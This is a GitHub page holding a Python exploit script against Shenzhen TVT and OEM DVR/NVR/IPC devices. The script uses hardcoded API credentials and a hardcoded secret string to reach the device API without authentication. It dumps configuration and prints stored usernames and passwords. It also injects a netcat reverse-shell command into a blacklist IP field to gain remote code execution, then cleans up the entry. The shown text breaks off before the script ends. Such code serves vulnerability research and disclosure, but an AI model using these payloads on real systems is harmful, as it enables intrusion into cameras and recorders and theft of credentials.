Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

981 lines (855 sloc) 32.7 KB
#!/usr/bin/env python2.7
# [SOF]
#
# Subject: Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE
#
# Attack vector: Remote
# Authentication: Anonymous (no credentials needed)
# Researcher: bashis <mcw noemail eu> (December 2018)
#
# Vulnerable: To many OEM vendors,products and versions to specify.
# Non Vulnerable: Firmware released from mid February 2018 from TVT and their OEM's
#
# Source Vendor: Shenzhen TVT Digital Technology Co. Ltd (http://en.tvt.net.cn/)
# OEM Vendors (+80): https://ipvm.com/forums/video-surveillance/topics/a-list-of-tvt-s-79-dvr-oems (Not complete list)
#
#
import socket
import select
import sys
import urllib, urllib2, httplib
import ssl
import argparse
import base64
import os
import sys
import xmltodict # pip install xmltodict
import json
from pwn import * # https://github.com/Gallopsled/pwntools
class HTTPconnect:
def __init__(self, host, proto, verbose, credentials, Raw, noexploit):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = credentials
self.Raw = Raw
self.noexploit = noexploit
def Send(self, uri, query_headers, query_data, ID):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID
# Connect-timeout in seconds
timeout = 10
socket.setdefaulttimeout(timeout)
url = '{}://{}{}'.format(self.proto, self.host, self.uri)
if self.verbose:
print "[Verbose] Sending:", url
if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Unverified Context"
ssl._create_default_https_context = ssl._create_unverified_context
if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)
if self.noexploit and not self.verbose:
print "[<] 204 Not Sending!"
html = "Not sending any data"
return html
else:
if self.query_data:
req = urllib2.Request(url, self.query_data, headers=self.query_headers)
else:
req = urllib2.Request(url, None, headers=self.query_headers)
try:
rsp = urllib2.urlopen(req)
except Exception as e:
if not hasattr (e,'reason'):
print "[<] Request is most likely being blocked ({})".format(str(e))
else:
print "[<] Payload response failed: {}".format(str(e))
return False
if self.Raw:
return rsp
else:
html = rsp.read()
return html
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
class TVT:
def __init__(self, rhost, rport, proto, verbose, credentials, raw_request, noexploit, headers):
self.rhost = rhost
self.rport = rport
self.proto = proto
self.verbose = verbose
self.credentials = credentials
self.raw_request = raw_request
self.noexploit = noexploit
self.headers = headers
self.BUFFER_SIZE = 1024
def APIConfigClient(self, lhost, lport, cmd, request):
self.lhost = lhost
self.lport = lport
self.cmd = cmd
self.request = request
if self.rport == '4567' and self.cmd != 'doLogin':
self.sock = self.Connect_4567()
response = self.GetSystemConfig(self.sock, self.request)
response = response.split()
if self.cmd == 'DumpSystemConfig':
if self.rport == '4567':
TVT_bin = base64.b64decode(response[12]) # Base64 'SystemConfig'
XML_2_JSON = self.GetXML_2_JSON(TVT_bin)
print "[i] Dumping Config"
for what in XML_2_JSON.keys():
print json.dumps(XML_2_JSON[what],indent=4)
else:
if (self.GetDeviceInfo_HTTP(lhost, lport,True)): # Light version of 'SystemConfig'
return True
else:
return False
elif self.cmd == 'GetInfo':
if self.rport == '4567':
TVT_bin = base64.b64decode(response[12]) # Base64 'SystemConfig'
XML_2_JSON = self.GetXML_2_JSON(TVT_bin)
self.Extract_Info(XML_2_JSON)
else:
if (self.GetDeviceInfo_HTTP(lhost, lport,False)):
return True
else:
return False
elif self.cmd == 'doLogin':
if self.rport == '4567':
print "[!] Login do not work here, no need for it..."
return True
else:
if (self.doLogin_HTTP(lhost, lport)):
return True
else:
return False
elif self.cmd == 'queryQRInfo':
if self.rport == '4567':
OUT = ''
for xml in range(15,len(response)):
OUT += response[xml]
XML_2_JSON = xmltodict.parse(OUT)
if XML_2_JSON['response']['status'] == 'success':
QR_img = base64.b64decode(XML_2_JSON['response']['content']['data'])
file = open(rhost + '_QR.png','wb')
file.write(QR_img)
file.close()
print "[i] QR Image saved: {}".format(rhost + '_QR.png')
else:
if (self.queryQRInfo_HTTP(self.lhost, self.lport)):
return True
else:
return False
elif self.cmd == 'GetUsernamePassword':
if self.rport == '4567':
TVT_bin = base64.b64decode(response[12]) # Base64 'SystemConfig'
XML_2_JSON = self.GetXML_2_JSON(TVT_bin)
username, password = self.GetLoginPassword(TVT_bin, XML_2_JSON)
print "[i] Username: {}, Password: {}".format(username,password)
else:
if (self.queryUserList_HTTP(self.lhost, self.lport)):
return True
else:
return False
elif self.cmd == 'RCE':
if self.rport == '4567':
self.RCE_4567(self.lhost, self.lport, self.sock)
else:
if(self.RCE_HTTP(self.lhost, self.lport)):
return True
else:
return False
if self.rport == '4567':
self.sock.close()
print "[i] Disconnected"
#
# Stuff for HTTP/HTTPS Access
#
def queryQRInfo_HTTP(self, lhost, lport):
self.lhost = lhost
self.lport = lport
self.remote_host = self.rhost + ':' + self.rport
headers = {
'Connection': 'close',
'Content-Type' : 'application/x-www-form-urlencoded',
'Host' : rhost,
'Authorization' : 'Basic ' + base64.b64encode(self.credentials),
'Accept' : '*/*',
'Accept-Language' : 'en-us',
'Cache-Control' : 'max-age=0',
'User-Agent':'ApiTool'
}
URI = '/queryQRInfo?userName=' + self.credentials.split(":")[0]
response = HTTPconnect(self.remote_host,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,headers,None,None)
if not response:
return False
file = open(rhost + '_QR.png','wb')
file.write(response)
file.close()
print "[i] QR Image saved: {}".format(rhost + '_QR.png')
return True
def doLogin_HTTP(self, lhost, lport):
self.lhost = lhost
self.lport = lport
self.remote_host = self.rhost + ':' + self.rport
headers = {
'Connection': 'close',
'Content-Type' : 'application/x-www-form-urlencoded',
'Host' : rhost,
'Authorization' : 'Basic ' + base64.b64encode(self.credentials),
'Accept' : '*/*',
'Accept-Language' : 'en-us',
'Cache-Control' : 'max-age=0',
'User-Agent':'ApiTool'
}
MSG = '<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>'
URI = '/doLogin'
print "[>] Query for username(s)/password(s)"
response = HTTPconnect(self.remote_host,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,headers,MSG,None)
if not response:
return False
self.XML_2_JSON = xmltodict.parse(response)
if self.XML_2_JSON['response']['status'] == 'success':
print "[<] 200 OK"
# print json.dumps(self.XML_2_JSON['response'],indent=4)
for who in self.XML_2_JSON['response']['content']:
if who == 'userId':
print "[<] User ID: {}".format(self.XML_2_JSON['response']['content']['userId'])
elif who == 'adminName':
print "[<] Admin Name: {}".format(self.XML_2_JSON['response']['content']['adminName'])
elif who == 'sessionId':
print "[<] Session ID: {}".format(self.XML_2_JSON['response']['content']['sessionId'])
elif who == 'resetPassword':
print "[<] Reset Password: {}".format(base64.b64decode(self.XML_2_JSON['response']['content']['resetPassword']))
return True
else:
if self.XML_2_JSON['response']['errorCode'] == '536870948':
print "[<] Wrong Password!"
elif self.XML_2_JSON['response']['errorCode'] == '536870947':
print "[<] Wrong Username!"
else:
print json.dumps(self.XML_2_JSON['response'],indent=4)
return False
def queryUserList_HTTP(self, lhost, lport):
self.lhost = lhost
self.lport = lport
self.remote_host = self.rhost + ':' + self.rport
headers = {
'Connection': 'close',
'Content-Type' : 'application/x-www-form-urlencoded',
'Host' : rhost,
'Authorization' : 'Basic ' + base64.b64encode(self.credentials),
'Accept' : '*/*',
'Accept-Language' : 'en-us',
'Cache-Control' : 'max-age=0',
'User-Agent':'ApiTool'
}
MSG = '<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>'
URI = '/queryUserList'
print "[>] Query for username(s)/password(s)"
response = HTTPconnect(self.remote_host,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,headers,MSG,None)
if not response:
return False
self.XML_2_JSON = xmltodict.parse(response)
if self.XML_2_JSON['response']['status'] == 'success':
print "[<] 200 OK"
# print json.dumps(self.XML_2_JSON['response'],indent=4)
# One User only
for who in self.XML_2_JSON['response']['content']['item']:
if who == 'userName':
print "[<] Username: {}, Password: {}".format(self.XML_2_JSON['response']['content']['item']['userName'], self.XML_2_JSON['response']['content']['item']['password'])
return True
# Several Users
for who in range(0, len(self.XML_2_JSON['response']['content']['item'])):
if (self.XML_2_JSON['response']['content']['item'][who]['enabled'] == 'true'):
print "[<] Username: {}, Password: {}".format(self.XML_2_JSON['response']['content']['item'][who]['userName'], self.XML_2_JSON['response']['content']['item'][who]['password'])
return True
else:
if self.XML_2_JSON['response']['errorCode'] == '536870948':
print "[<] Wrong Password!"
elif self.XML_2_JSON['response']['errorCode'] == '536870947':
print "[<] Wrong Username!"
else:
print json.dumps(self.XML_2_JSON['response'],indent=4)
return False
def GetDeviceInfo_HTTP(self, lhost, lport, dump):
self.lhost = lhost
self.lport = lport
self.dump = dump
self.remote_host = self.rhost + ':' + self.rport
headers = {
'Connection': 'close',
'Content-Type' : 'application/x-www-form-urlencoded',
'Host' : rhost,
'Authorization' : 'Basic ' + base64.b64encode(self.credentials),
'Accept' : '*/*',
'Accept-Language' : 'en-us',
'Cache-Control' : 'max-age=0',
'User-Agent':'ApiTool'
}
MSG = '<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>'
URI = '/queryBasicCfg'
print "[>] Get info about remote target"
response = HTTPconnect(self.remote_host,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,headers,MSG,None)
if not response:
return False
self.XML_2_JSON = xmltodict.parse(response)
if self.XML_2_JSON['response']['status'] == 'success':
print "[<] 200 OK"
if self.dump:
print json.dumps(self.XML_2_JSON,indent=4)
return True
else:
if self.XML_2_JSON['response']['errorCode'] == '536870948':
print "[<] Wrong Password!"
elif self.XML_2_JSON['response']['errorCode'] == '536870947':
print "[<] Wrong Username!"
else:
print json.dumps(self.XML_2_JSON['response'],indent=4)
return False
for tmp2 in self.XML_2_JSON['response'].keys():
if tmp2 == 'content':
for tmp3 in self.XML_2_JSON['response'][tmp2].keys():
if tmp3 == 'softwareVersion':
print "[i] Firmware Version: {}".format(self.XML_2_JSON['response'][tmp2]['softwareVersion'])
elif tmp3 == 'kenerlVersion':
print "[i] Kernel Version: {}".format(self.XML_2_JSON['response'][tmp2]['kenerlVersion'])
elif tmp3 == 'launchDate':
print "[i] Software Date: {}".format(self.XML_2_JSON['response'][tmp2]['launchDate'])
elif tmp3 == 'hardwareVersion':
print "[i] Hardware Version: {}".format(self.XML_2_JSON['response'][tmp2]['hardwareVersion'])
elif tmp3 == 'customerId':
print "[i] Customer/OEM ID: {}".format(self.XML_2_JSON['response'][tmp2]['customerId'])
elif tmp3 == 'manufacturer':
print "[i] Manufacture/OEM: {}".format(self.XML_2_JSON['response'][tmp2]['manufacturer']['item'][0]['@translateKey'])
elif tmp3 == 'sn':
print "[i] Serial Number: {}".format(self.XML_2_JSON['response'][tmp2]['sn'])
elif tmp3 == 'productModel':
print "[i] Device Model: {}".format(self.XML_2_JSON['response'][tmp2]['productModel'])
elif tmp3 == 'name':
print "[i] Device Name: {}".format(self.XML_2_JSON['response'][tmp2]['name'])
elif tmp3 == 'defaultUser':
print "[i] Default User: {}".format(self.XML_2_JSON['response'][tmp2]['defaultUser']['item']['#text'])
return True
def RCE_HTTP(self, lhost, lport):
self.lhost = lhost
self.lport = lport
self.remote_host = self.rhost + ':' + self.rport
if not (self.GetDeviceInfo_HTTP(lhost, lport,False)):
return False
headers = {
'Connection': 'close',
'Content-Type' : 'text/xml',
'Host' : rhost,
'Authorization' : 'Basic ' + base64.b64encode(self.credentials),
'Accept' : '*/*',
'Accept-Language' : 'en-us',
'Cache-Control' : 'max-age=0',
'User-Agent':'ApiTool'
}
ADD_RCE = """<?xml version="1.0" encoding="utf-8"?>
<request version="1.0" systemType="NVMS-9000" clientType="WEB">
<types>
<filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode>
<addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType>
</types>
<content>
<switch>true</switch>
<filterType type="filterTypeMode">refuse</filterType>
<filterList type="list"><itemType><addressType type="addressType"/></itemType>
<item><switch>true</switch><addressType>ip</addressType>
<ip>$(nc${IFS}LHOST${IFS}LPORT${IFS}-e${IFS}$SHELL&)</ip>
</item>
</filterList>
</content>
</request>
"""
DEL_RCE = """<?xml version="1.0" encoding="utf-8"?>
<request version="1.0" systemType="NVMS-9000" clientType="WEB">
<types>
<filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode>
<addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType>
</types>
<content><switch>false</switch><filterType type="filterTypeMode">allow</filterType>
<filterList type="list">
<itemType>
<addressType type="addressType"/>
</itemType>
</filterList>
</content>
</request>
"""
ADD_RCE = ADD_RCE.replace("LHOST",self.lhost).replace("\t",'').replace("\n",'')
ADD_RCE = ADD_RCE.replace("LPORT",self.lport)
DEL_RCE = DEL_RCE.replace("\t",'').replace("\n",'')
URI = '/editBlackAndWhiteList'
#
# Enable RCE and execute
#
print "[>] Adding and executing RCE"
response = HTTPconnect(self.remote_host,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,headers,ADD_RCE,None)
if not response:
return False
XML_2_JSON = xmltodict.parse(response)
if XML_2_JSON['response']['status'] == 'success':
print "[<] 200 OK"
elif XML_2_JSON['response']['status'] == 'fail':
if self.XML_2_JSON['response']['errorCode'] == '536870948':
print "[<] Wrong Password!"
elif self.XML_2_JSON['response']['errorCode'] == '536870947':
print "[<] Wrong Username!"
else:
print json.dumps(self.XML_2_JSON['response'],indent=4)
return False
#
# Delete RCE
#
print "[>] Removing RCE"
response = HTTPconnect(self.remote_host,self.proto,self.verbose,self.credentials,False,self.noexploit).Send(URI,headers,DEL_RCE,None)
if not response:
return False
XML_2_JSON = xmltodict.parse(response)
if XML_2_JSON['response']['status'] == 'success':
print "[<] 200 OK"
elif XML_2_JSON['response']['status'] == 'fail':
if self.XML_2_JSON['response']['errorCode'] == '536870948':
print "[<] Wrong Password!"
elif self.XML_2_JSON['response']['errorCode'] == '536870947':
print "[<] Wrong Username!"
else:
print json.dumps(self.XML_2_JSON['response'],indent=4)
return False
return True
#
# Stuff when bypassing 'ConfigSyncProc'
#
def GetLoginPassword(self, TVT, XML_2_JSON):
self.TVT = TVT
self.XML_2_JSON = XML_2_JSON
# Username may not always be 'admin'; so get default username to search for
for what in self.XML_2_JSON.keys():
for tmp in self.XML_2_JSON[what].keys():
if tmp == 'response':
for tmp2 in self.XML_2_JSON[what]['response'].keys():
if tmp2 == 'content':
for tmp3 in self.XML_2_JSON[what]['response'][tmp2].keys():
if tmp3 == 'defaultUser':
DEFAULT_USER = str(self.XML_2_JSON[what]['response'][tmp2]['defaultUser']['item']['#text'])
where = self.TVT.find(DEFAULT_USER)
LOGIN = self.TVT[where:where+64].replace('\x00','')
PASSWORD = self.TVT[where+64:where+128].replace('\x00','')
return LOGIN, PASSWORD
def GetXML_2_JSON(self, TVT):
self.TVT = TVT
self.TVT = self.TVT.replace('\x00','')
where = self.TVT.find('<?xml version="1.0" encoding="UTF-8"?>')
DB = {}
TEST = ''
DB_CNT = 0
TEMP = self.TVT[where:].split('\n')
for where in range(0,len(TEMP)):
if TEMP[where] == '<?xml version="1.0" encoding="UTF-8"?>':
DB[DB_CNT] = {'start':0,'stop':0}
DB[DB_CNT]['start'] = where
DB_CNT += 1
else:
DB[DB_CNT-1]['stop'] = where+1
XML_2_JSON = {}
for what in DB.keys():
OUT = ''
for where in range (DB[what]['start'], DB[what]['stop']):
OUT += TEMP[where]
XML_2_JSON[what] = xmltodict.parse(OUT)
return XML_2_JSON
def Extract_Info(self, XML_2_JSON):
self.XML_2_JSON = XML_2_JSON
for what in self.XML_2_JSON.keys():
for tmp in self.XML_2_JSON[what].keys():
# if tmp == 'request':
# for tmp2 in self.XML_2_JSON[what]['request'].keys():
# if tmp2 == 'content':
# for tmp3 in self.XML_2_JSON[what]['request'][tmp2].keys():
# if tmp3 == 'reservedPort':
# print "[i] Reserved Port(s): {}".format(self.XML_2_JSON[what]['request'][tmp2]['reservedPort'])
# elif tmp3 == 'httpPort':
# print "[i] HTTP Port: {}".format(self.XML_2_JSON[what]['request'][tmp2]['httpPort'])
# elif tmp3 == 'nicConfigs':
# print "[i] NIC Configs: {}".format(json.dumps(self.XML_2_JSON[what]['request'][tmp2]['nicConfigs']['item'],indent=4))
# elif tmp == 'response':
if tmp == 'response':
for tmp2 in self.XML_2_JSON[what]['response'].keys():
if tmp2 == 'content':
for tmp3 in self.XML_2_JSON[what]['response'][tmp2].keys():
if tmp3 == 'softwareVersion':
print "[i] Firmware Version: {}".format(self.XML_2_JSON[what]['response'][tmp2]['softwareVersion'])
elif tmp3 == 'kenerlVersion':
print "[i] Kernel Version: {}".format(self.XML_2_JSON[what]['response'][tmp2]['kenerlVersion'])
elif tmp3 == 'launchDate':
print "[i] Software Date: {}".format(self.XML_2_JSON[what]['response'][tmp2]['launchDate'])
elif tmp3 == 'hardwareVersion':
print "[i] Hardware Version: {}".format(self.XML_2_JSON[what]['response'][tmp2]['hardwareVersion'])
elif tmp3 == 'customerId':
print "[i] Customer/OEM ID: {}".format(self.XML_2_JSON[what]['response'][tmp2]['customerId'])
elif tmp3 == 'manufacturer':
print "[i] Manufacture/OEM: {}".format(self.XML_2_JSON[what]['response'][tmp2]['manufacturer']['item'][0]['@translateKey'])
elif tmp3 == 'sn':
print "[i] Serial Number: {}".format(self.XML_2_JSON[what]['response'][tmp2]['sn'])
elif tmp3 == 'productModel':
print "[i] Device Model: {}".format(self.XML_2_JSON[what]['response'][tmp2]['productModel'])
elif tmp3 == 'name':
print "[i] Device Name: {}".format(self.XML_2_JSON[what]['response'][tmp2]['name'])
elif tmp3 == 'defaultUser':
print "[i] Default User: {}".format(self.XML_2_JSON[what]['response'][tmp2]['defaultUser']['item']['#text'])
def RCE_4567(self, lhost, lport, sock):
self.lhost = lhost
self.lport = lport
self.sock = sock
ADD_MESSAGE = "GET /saveSystemConfig HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length: CONTENT_LENGTH\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 2\r\n\r\n"
ADD_RCE = "\x0c\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x21\x00\x02\x00\x01\x00\x04\x00_LEN_LEN\x00\x00\x00\x00" # 32 bytes
ADD_RCE += """<?xml version="1.0" encoding="utf-8"?>
<request version="1.0" systemType="NVMS-9000" clientType="WEB">
<types>
<filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode>
<addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType>
</types>
<content>
<switch>true</switch>
<filterType type="filterTypeMode">refuse</filterType>
<filterList type="list"><itemType><addressType type="addressType"/></itemType>
<item><switch>true</switch><addressType>ip</addressType>
<ip>$(nc${IFS}LHOST${IFS}LPORT${IFS}-e${IFS}$SHELL${IFS}&)</ip>
</item>
</filterList>
</content>
</request>
"""
ADD_RCE += "\x00"
DEL_MESSAGE = "GET /saveSystemConfig HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length: CONTENT_LENGTH\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 3\r\n\r\n"
DEL_RCE = "\x0c\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x21\x00\x02\x00\x01\x00\x04\x00_LEN_LEN\x00\x00\x00\x00" # 32 bytes
DEL_RCE += """<?xml version="1.0" encoding="utf-8"?>
<request version="1.0" systemType="NVMS-9000" clientType="WEB">
<types>
<filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode>
<addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType>
</types>
<content><switch>false</switch><filterType type="filterTypeMode">allow</filterType>
<filterList type="list">
<itemType>
<addressType type="addressType"/>
</itemType>
</filterList>
</content>
</request>
"""
DEL_RCE += "\x00"
ADD_RCE = ADD_RCE.replace("LHOST",self.lhost).replace("\t",'').replace("\n",'')
ADD_RCE = ADD_RCE.replace("LPORT",self.lport)
DEL_RCE = DEL_RCE.replace("\t",'').replace("\n",'')
#
# Enable RCE and execute
#
LEN = len(ADD_RCE)-32
LEN = struct.pack("<I",LEN)
ADD_RCE = string.replace(ADD_RCE,'_LEN',LEN)
ADD_MESSAGE = ADD_MESSAGE.replace("CONTENT_LENGTH",str(len(base64.b64encode(ADD_RCE))))
ADD_MESSAGE += base64.b64encode(ADD_RCE)
print "[i] Adding and executing RCE"
response = self.Send_4567(self.sock, ADD_MESSAGE)
tmp = response.split()
if tmp[1] != '200':
print "[!] Error".format(response)
return False
#
# Delete RCE
#
LEN = len(DEL_RCE)-32
LEN = struct.pack("<I",LEN)
DEL_RCE = string.replace(DEL_RCE,'_LEN',LEN)
DEL_MESSAGE = DEL_MESSAGE.replace("CONTENT_LENGTH",str(len(base64.b64encode(DEL_RCE))))
DEL_MESSAGE += base64.b64encode(DEL_RCE)
print "[i] Removing RCE"
response = self.Send_4567(self.sock, DEL_MESSAGE)
if tmp[1] != '200':
print "[!] Error".format(response)
return False
def Send_4567(self, sock, message):
self.sock = sock
self.message = message
try:
print "[>] Sending"
self.sock.send(self.message)
response = self.sock.recv(self.BUFFER_SIZE)
except Exception as e:
print "[!] Send failed ({})".format(e)
self.sock.close()
sys.exit(1)
print "[<] 200 OK"
return response
def Connect_4567(self):
TVT_rport = 4567 # Default Remote PORT
MESSAGE = "{D79E94C5-70F0-46BD-965B-E17497CCB598}" # Hardcoded 'Secret' string
timeout = 5
socket.setdefaulttimeout(timeout)
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.rhost, TVT_rport))
print "[i] Connected"
except Exception as e:
print "[!] Connection failed ({})".format(e)
sys.exit(1)
try:
print "[>] Verifying access"
self.sock.send(MESSAGE)
response = self.sock.recv(self.BUFFER_SIZE)
except Exception as e:
print "[!] Sending failed ({})".format(e)
self.sock.close()
sys.exit(1)
if response != MESSAGE:
print "[!] NO MATCH\n[!] Response: {}".format(response)
self.sock.close()
sys.exit(0)
else:
print "[<] 200 OK"
return self.sock
def GetSystemConfig(self, sock, request):
self.sock = sock
self.request = request
# Get System Config, including l/p in clear text (base64 encoded)
if self.request == 'requestSystemConfig':
MESSAGE = "GET /requestSystemConfig HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length:0\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 1\r\n\r\n"
elif self.request == 'requestSystemCapabilitySetInfo':
MESSAGE = "GET /requestSystemCapabilitySetInfo HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length:0\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 1\r\n\r\n"
# Get QR Code image in format .png (base64 encoded)
elif self.request == 'queryQRInfo':
MESSAGE = "GET /queryQRInfo HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length:0\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 1\r\n\r\n"
# Default for RCE, only to pass thru below checkings
else:
MESSAGE = "GET /queryQRInfo HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length:0\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 1\r\n\r\n"
self.sock.send(MESSAGE)
buf = ''
response = self.sock.recv(self.BUFFER_SIZE)
if response.split()[1] == '200':
tmp = response.split()[6] # Content-Length:
else:
tmp = False
buf += response
if int(tmp) and int(tmp) > self.BUFFER_SIZE:
try:
while True:
if len(buf.split()[12]) == int(tmp):
break
if self.sock:
response = self.sock.recv(self.BUFFER_SIZE)
else:
break
buf += response
except Exception as e:
print "[!] Error ({})".format(e)
self.sock.close()
sys.exit(1)
return buf
if __name__ == "__main__":
INFO = '\nTVT & OEM {DVR/NVR/IPC} API RCE (2018 bashis)\n'
rhost = '192.168.57.20' # Default Remote HOST
rport = '80' # Default Remote PORT
lhost = '192.168.57.1' # Default Local HOST
lport = '1337' # Default Local PORT
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
noexploit = False
raw_request = True
# credentials = 'admin:123456' # Default l/p
credentials = 'admin:{12213BD1-69C7-4862-843D-260500D1DA40}' # Hardcoded HTTP/HTTPS API l/p
headers = {
'Connection': 'close',
'Content-Type' : 'application/x-www-form-urlencoded',
'Accept' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
'User-Agent':'ApiTool'
}
try:
arg_parser = argparse.ArgumentParser(
prog=sys.argv[0],
description=('[*] '+ INFO +' [*]'))
arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ str(rport) +']')
arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
arg_parser.add_argument('--autoip', required=False, default=False, action='store_true', help='Detect External Connect Back IP [Default: False]')
arg_parser.add_argument('--getrce', required=False, default=False, action='store_true', help='Remote Command Execution (Reverse Shell)')
arg_parser.add_argument('--getdump', required=False, default=False, action='store_true', help='Dump System Config from remote target')
arg_parser.add_argument('--getinfo', required=False, default=False, action='store_true', help='Extract some device info from remote target')
arg_parser.add_argument('--getcreds', required=False, default=False, action='store_true', help='Extract username/password from remote target')
arg_parser.add_argument('--getQR', required=False, default=False, action='store_true', help='Get and save QR Code Image [<rhost>_QR.png]')
arg_parser.add_argument('--getlogin', required=False, default=False, action='store_true', help='Login PoC at remote target')
if credentials:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ credentials + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: {}\n".format(str(e))
sys.exit(1)
print INFO
request = ''
if args.getrce:
cmd = 'RCE'
elif args.getdump:
cmd = 'DumpSystemConfig'
request = 'requestSystemConfig'
elif args.getinfo:
cmd = 'GetInfo'
request = 'requestSystemConfig'
elif args.getcreds:
cmd = 'GetUsernamePassword'
request = 'requestSystemConfig'
elif args.getQR:
cmd = 'queryQRInfo'
request = 'queryQRInfo'
elif args.getlogin:
cmd = 'doLogin'
request = 'doLogin'
else:
print "[!] Choose something to do...\n[--getrce | --getdump | --getinfo | --getcreds | --getQR | --getlogin]"
sys.exit(1)
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if credentials and args.auth:
credentials = args.auth
if args.noexploit:
noexploit = args.noexploit
if args.verbose:
verbose = True
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
if args.lport:
lport = args.lport
if args.lhost:
lhost = args.lhost
elif args.autoip:
# HTTP check of our external IP
try:
headers = {
'Connection': 'close',
'Accept' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.8',
'Cache-Control' : 'max-age=0',
'User-Agent':'ApiTool'
}
print "[>] Trying to find out my external IP"
lhost = HTTPconnect("whatismyip.akamai.com",proto,verbose,credentials,False,noexploit).Send("/",headers,None,None)
if verbose:
print "[Verbose] Detected my external IP:",lhost
except Exception as e:
print "[<] ",e
sys.exit(1)
# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if LPORT is valid
if not Validate(verbose).Port(lport):
print "[!] Invalid LPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
# Check if LHOST is valid IP or FQDN, get IP back
lhost = Validate(verbose).Host(lhost)
if not lhost:
print "[!] Invalid LHOST"
sys.exit(1)
#
# Validation done, start print out stuff to the user
#
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport
if cmd == 'RCE':
print "[i] Connect back IP:",lhost
print "[i] Connect back PORT:",lport
#
# HTTP API with hardcoded authentication on TCP/4567 to NVMS9000 (bypass of ConfigSyncProc)
#
if args.rport == '4567':
